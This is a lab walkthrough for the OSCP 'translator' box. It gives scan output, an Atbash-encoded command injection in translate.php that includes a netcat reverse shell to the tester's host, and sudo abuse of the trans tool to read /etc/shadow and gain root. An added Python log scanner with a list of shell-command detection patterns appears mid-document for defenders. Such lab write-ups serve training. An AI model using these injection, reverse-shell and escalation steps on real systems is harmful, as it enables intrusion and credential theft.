【OSCP】translator

admin 2024-06-07 08:09:58

OSCP Lab

Lab overview

translator

easy

Command execution, sudo privilege escalation, privilege escalation via trans

Information gathering

Host discovery

Port scanning

└─# nmap -sV -A -p- -T4 192.168.31.238
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-14 07:19 EST
Nmap scan report for 192.168.31.238
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 08:cf:50:b2:4f:41:43:c4:66:56:ce:96:b9:04:8c:77 (RSA)
| 256 40:b7:11:24:76:59:cd:e0:79:db:71:d1:39:29:d5:45 (ECDSA)
|_ 256 44:64:ba:b8:52:4f:ca:00:dd:3e:c3:28:71:6f:77:76 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:E5:34:AB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.39 ms 192.168.31.238

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.81 seconds

Directory scanning

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.238 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.238
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.238/index.html (Status: 200) [Size: 290]
http://192.168.31.238/translate.php (Status: 200) [Size: 20]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

Gaining access

Here we found that when the transformed string is submitted, the page returns the command's output, which indicates that command execution is possible.

Using https://www.dcode.fr/cipher-identifier we identified the encoding as Atbash.

/translate.php?hmv=id;cat+translate.php
/translate.php?hmv=id;xzg gizmhozgv.ksk

http://192.168.31.238/translate.php?hmv=id;mx%20-x%20/yrm/yzhs%20192.168.31.181%208888
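As an added example (not code from the original post or the lab itself), here is a defender-side log check for this injection: translate.php accepts an Atbash-wrapped hmv parameter, so a filter that only inspects the raw query string sees the ';' but never the command names. The script decodes the parameter from constructed nginx access-log lines and flags shell metacharacters or command names in either the raw or the decoded form. The log layout and the SUSPICIOUS token list are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed nginx access-log lines (not taken from the original post); the
# second and third carry the Atbash-wrapped payloads shown in the writeup.
SAMPLE_LOG = """\
192.168.31.181 - - [14/Feb/2024:07:30:01 -0500] "GET /translate.php?hmv=svool HTTP/1.1" 200 20 "-" "curl/8.0"
192.168.31.181 - - [14/Feb/2024:07:31:12 -0500] "GET /translate.php?hmv=id;xzg+gizmhozgv.ksk HTTP/1.1" 200 640 "-" "curl/8.0"
192.168.31.181 - - [14/Feb/2024:07:32:45 -0500] "GET /translate.php?hmv=id;mx%20-x%20/yrm/yzhs%20192.168.31.181%208888 HTTP/1.1" 200 0 "-" "curl/8.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<path>\S+)')
# Shell metacharacters and command names worth a closer look (assumed list, extend as needed).
SUSPICIOUS = re.compile(r'[;|&`$]|/bin/|\b(?:nc|bash|sh|cat|curl|wget|python\d?)\b')
_LOWER = "abcdefghijklmnopqrstuvwxyz"
ATBASH = str.maketrans(_LOWER + _LOWER.upper(), _LOWER[::-1] + _LOWER.upper()[::-1])

def atbash(text):
    """Atbash maps a<->z, b<->y, ...; it is its own inverse, so this both decodes and encodes."""
    return text.translate(ATBASH)

def query_params(path):
    """Split the query by hand: parse_qs treated ';' as a separator on older Pythons, cutting the payload."""
    if "?" not in path:
        return {}
    params = {}
    for pair in path.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def inspect_line(line):
    """Return (decoded_hmv, sorted_hits) when the hmv parameter looks like injected shell, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    value = query_params(match.group("path")).get("hmv")
    if value is None:
        return None
    decoded = atbash(value)
    # Check both forms: the raw value still shows ';', the decoded one shows the command names.
    hits = sorted(set(SUSPICIOUS.findall(value)) | set(SUSPICIOUS.findall(decoded)))
    return (decoded, hits) if hits else None

def scan(log_text):
    """Return [(log_line, decoded_hmv, hits), ...] for every flagged request in the log."""
    results = ((line, inspect_line(line)) for line in log_text.splitlines())
    return [(line, *hit) for line, hit in results if hit]
```

Running scan(SAMPLE_LOG) flags the second and third lines and shows the decoded commands beside the tokens that triggered the match.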

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z shortcut
stty -a
stty raw -echo;fg
reset

Privilege escalation

A string was found in the root directory; once decoded, it is a password.

Use sudo to escalate to the india account:

https://gtfobins.github.io/gtfobins/choom/

Escalate privileges via trans; command reference: https://www.jianshu.com/p/da570df21ae8

This is Google's shell-based translation tool, so reaching Google requires a proxy; we appended the -x proxy option and successfully read the shadow file.

sudo /usr/local/bin/trans -i /etc/shadow -x http://192.168.31.11:7890 -no-auto
sudo /usr/local/bin/trans -i /root/root.txt -x http://192.168.31.11:7890 -no-auto

┌──(root㉿kali)-[~]
└─# cat shadow
root:$y$j9T$0joZ0oj3e80LfnTHpkekz.$4kPdxlVJVQ/dfaEAR8qAOVlqivUAg2kQmXvsrXOMsMD:19123:0:99999:7:::
india:$y$j9T$uh47pVJ1gtUpSE0fnbOZL1$iXJzdmDEqRk5G.7finhLe.0ZibKHoLCu.EDwdUguKl4:19123:0:99999:7:::

After retrieving it we tried cracking the hashes with john, but nothing was cracked.

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

We can also read the root.txt flag directly.

Alternatively, the following command escalates directly to root:

sudo /usr/local/bin/trans -pager less -x http://192.168.31.11:7890

End

Originally published on the WeChat official account (贝雷帽SEC): 【OSCP】translator